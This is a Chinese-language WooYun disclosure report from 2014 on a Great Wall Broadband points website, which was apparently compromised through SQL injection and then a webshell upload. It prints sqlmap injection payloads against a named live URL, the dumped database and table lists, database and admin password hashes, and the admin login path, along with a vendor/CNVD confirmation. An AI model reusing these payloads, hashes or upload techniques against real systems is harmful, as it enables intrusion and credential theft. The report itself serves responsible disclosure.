当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-056728

漏洞标题:某地区长城宽带SQL注入漏洞+getshell(详细过程与影响证明)

相关厂商:长城宽带

漏洞作者: 23号

提交时间:2014-04-13 12:55

修复时间:2014-05-28 12:55

公开时间:2014-05-28 12:55

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-04-13: 细节已通知厂商并且等待厂商处理中
2014-04-18: 厂商已经确认,细节仅向厂商公开
2014-04-28: 细节向核心白帽子及相关领域专家公开
2014-05-08: 细节向普通白帽子公开
2014-05-18: 细节向实习白帽子公开
2014-05-28: 细节向公众公开

简要描述:

注入漏洞已get shell

详细说明:

http://point.gzgwbn.net.cn/newsinfo.aspx?nid=72 注入点在这里

Place: GET
Parameter: nid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: nid=72 AND 8365=8365
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: nid=-6303 OR 2019=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)


available databases [9]:
[*] Appreciation
[*] GZGWBN_Points
[*] GZGWBN_WPF
[*] GZGWBN_WPF1
[*] GZGWBN_WPF2
[*] master
[*] model
[*] msdb
[*] tempdb
9个库子

Database: GZGWBN_Points
[81 tables]
+--------------------------------+
| A111                           |
| A_2012_0507                    |
| AoYun2012_Answer               |
| AoYun2012_Answer_Bak           |
| AoYun2012_Result               |
| ApplyOTT                       |
| ApplySignUp                    |
| Bak_sys_custb                  |
| D99_Tmp                        |
| GZ_Lottery                     |
| GZ_Lottery_PlayNums            |
| GZ_Point_BatchDeal             |
| GZ_Point_V_Quantity_GoodsBook  |
| GZ_Summer_Lottery              |
| PackageSatisticsList           |
| ProductPayNum                  |
| Questionnaire                  |
| VPoint_Donation_Before_2006    |
| V_Commentary                   |
| V_CustomerPoint                |
| V_DealInfo                     |
| V_Deal_RowColumn               |
| V_GZ_Lottery                   |
| V_Goods_NowQuan                |
| V_Lottery_CountByDays          |
| V_Lottery_CountByGoods         |
| V_Lottery_CountBySH            |
| V_QuantityStatistics           |
| V_Quantity_Active_Book_GrowDay |
| V_Quantity_Active_SH           |
| V_Quantity_GoodsBook           |
| V_Summer_Lottery               |
| V_Summer_Lottery_CountByDays   |
| custbb                         |
| hd_ganentb                     |
| scoretbb                       |
| shop_basetb                    |
| shop_goodoneclasstb            |
| shop_goodstb                   |
| shop_goodtwoclasstb            |
| shop_helptb                    |
| shop_huantb                    |
| shop_nclasstb                  |
| shop_newstb                    |
| shop_notetb                    |
| shop_saytb                     |
| shop_scoretb                   |
| shop_selecttb                  |
| shop_usertb                    |
| sys_admintb                    |
| sys_biantb                     |
| sys_blackcustb                 |
| sys_caotb                      |
| sys_cuntb                      |
| sys_custb                      |
| sys_dealtb                     |
| sys_emailtb                    |
| sys_hourtb                     |
| sys_ozhantb                    |
| sys_protb                      |
| sys_qutb                       |
| sys_scoretb                    |
| sys_useremailtb                |
| sys_xingtb                     |
| sys_xitb                       |
| sys_yingtb                     |
| sys_zhantb                     |
| sys_zhantbbak                  |
| sys_zhetb                      |
| sysdiagrams                    |
| tEmailCount                    |
| tb_Luckydraw                   |
| tb_phoneActivate               |
| tb_sports_310                  |
| tb_sports_country              |
| tb_sports_help                 |
| tb_sports_main                 |
| tb_sports_mybet                |
| tb_sports_ssname               |
| tb_sports_user                 |
| vProductPayNum

挑了个库子跑表
别的库子里还有员工工资和银行卡号等信息,库实在太大了,跑的抗不住啊亲
还是SA权限

database management system users password hashes:
[*] BBSA [1]:
    password hash: 0x010011a6742cfce6ff23c521222535662f07ebfcc6d2322c6462
        header: 0x0100
        salt: 11a6742c
        mixedcase: fce6ff23c521222535662f07ebfcc6d2322c6462
[*] sa [1]:
    password hash: 0x01004086ceb665942725e30e13ba2f7425abeb2c1cd1612c7b3b
        header: 0x0100
        salt: 4086ceb6
        mixedcase: 65942725e30e13ba2f7425abeb2c1cd1612c7b3b


后台很好找:http://point.gzgwbn.net.cn/admin/login.aspx
跑表得出

+-----+----------------------------------+-------+
| uid | upwd                             | uname |
+-----+----------------------------------+-------+
| 1   | C922206634F4C33F728138ED57B6246B | admin |
| 4   | <blank>                          | NULL  |
+-----+----------------------------------+-------+


登录后台后发现FCKeditor上传,顿时死的心都有了,我白费劲了,但是发现此FCK上传不能利用,至少我这个彩笔是没那本事。。。

http://point.gzgwbn.net.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http%3A%2F%2Fpoint.gzgwbn.net.cn%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Faspx%2Fconnector.aspx


愁苦中意外发现后台传幻灯片的地方可以直接上传.aspx 顿时艳阳高照啊!!

99.jpg

到这里就算了,主要我用的这个长城宽带过了12点总掉线,给打电话投诉还没人接,大小也是一ISP啊!!所以。。但是纯属友情检测,绝对没有删改东西。

漏洞证明:

就传2个菜刀截图吧*-*

11.jpg


22.jpg

修复方案:

过滤参数,修复FCKeditor上传,最最重要是保证网络稳定啊亲,我不想半夜掉线了。

版权声明:转载请注明来源 23号@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2014-04-18 09:18

厂商回复:

CNVD确认并复现所述情况(仅验证第一道风险,SQL注入),已经由CNVD通过以往联系渠道,将通报发送至 和中处置。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-05-28 17:13 | char ( 路人 | Rank:13 漏洞数:3 | 中国平安,不只保险这么简单。)

    D99_Tmp ,这都被折腾成什么样子了。哈哈

  2. 2014-05-29 13:28 | 那个夏天骚年未老 ( 路人 | Rank:0 漏洞数:2 | 呵呵,呵,呵呵呵)

    同用长城宽带。。。